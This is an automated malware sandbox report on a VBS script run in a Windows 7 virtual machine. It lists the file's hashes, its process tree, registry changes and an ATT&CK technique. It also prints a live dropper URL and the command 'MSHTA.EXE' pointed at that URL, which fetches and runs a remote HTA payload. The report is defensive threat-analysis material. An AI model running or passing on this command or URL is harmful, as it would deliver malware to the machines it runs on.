7e2b18922467014df87db3d500b6b41ce7d5c16d82cbcd2cb9c089acb4f5c507

Analysis

max time kernel
44s
max time network
48s
platform
windows7_x64
resource
win7-20220715-en
resource tags

arch:x64arch:x86image:win7-20220715-enlocale:en-usos:windows7-x64system
submitted
09-08-2022 18:59

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

LIYDOERWQPOKERHAVAXOCI.vbs
Size

1KB
MD5

7fa6c86604b4b5706beac109127af386
SHA1

aeac233400b02928f3a025a740bcfd6e2f85cd8a
SHA256

04d8d89df7a3ebe9d24b4635b6f4760e81465d672cb9f010e020b336b2d811ec
SHA512

e79fe1be4f96e06da8f60e7bb486e854bbf66509c637f08734771cc6a26a8051a281f8e484145252cd2e90d7196175761ad14f4cf00122ae9431a330ba189330

Score

10^/10

Malware Config

Extracted

Language

hta

Source

URLs

hta.dropper

https://tradeguru.com.pk/enc.txt

Signatures

Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.

Processes:

MSHTA.EXE

description pid pid_target process target process

Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1248 1836 MSHTA.EXE
Blocklisted process makes network request 4 IoCs

Processes:

MSHTA.EXE

flow pid process

4 1248 MSHTA.EXE
5 1248 MSHTA.EXE
6 1248 MSHTA.EXE
7 1248 MSHTA.EXE
Modifies Internet Explorer settings 1 TTPs 1 IoCs
adware spyware

Modify Registry
T1112

Processes:

MSHTA.EXE

description ioc process

Key created \REGISTRY\USER\S-1-5-21-3440072777-2118400376-1759599358-1000\Software\Microsoft\Internet Explorer\Main MSHTA.EXE

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1248	1836	MSHTA.EXE

flow	pid	process
4	1248	MSHTA.EXE
5	1248	MSHTA.EXE
6	1248	MSHTA.EXE
7	1248	MSHTA.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3440072777-2118400376-1759599358-1000\Software\Microsoft\Internet Explorer\Main	MSHTA.EXE

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\LIYDOERWQPOKERHAVAXOCI.vbs"
1⤵
PID:1672

C:\Windows\system32\MSHTA.EXE
MSHTA.EXE https://tradeguru.com.pk/enc.txt
1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Modifies Internet Explorer settings
PID:1248

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads